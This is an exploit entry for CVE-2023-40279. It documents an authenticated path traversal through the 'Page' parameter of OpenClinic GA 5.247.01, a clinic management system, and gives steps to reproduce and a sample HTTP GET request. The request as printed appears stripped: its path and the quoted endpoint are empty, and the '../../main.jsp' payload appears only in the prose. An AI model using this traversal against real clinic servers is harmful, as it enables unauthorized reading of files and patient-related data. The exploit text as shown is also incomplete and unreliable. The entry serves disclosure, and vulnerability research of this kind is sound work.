OpenClinic GA 5.247.01 Exploit, Path Traversal (Authenticated)

# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
# Date: 2023-08-14
# Exploit Author: V. B.
# Vendor Homepage:
# Software Link:
# Version: OpenClinic GA 5.247.01
# Tested on: Windows 10, Windows 11
# CVE: CVE-2023-40279

# Details
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to ''. This vulnerability allows for the retrieval and execution of files from arbitrary directories.

# Proof of Concept (POC)
Steps to Reproduce:

- Crafting the Malicious GET Request:

- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):

GET /openclinic/ HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cache-Control: max-age=0

2. Confirming the Vulnerability:
- Send the crafted GET request to the target server.
- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
- This vulnerability can lead to sensitive information disclosure or more severe attacks.

All rights reserved 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD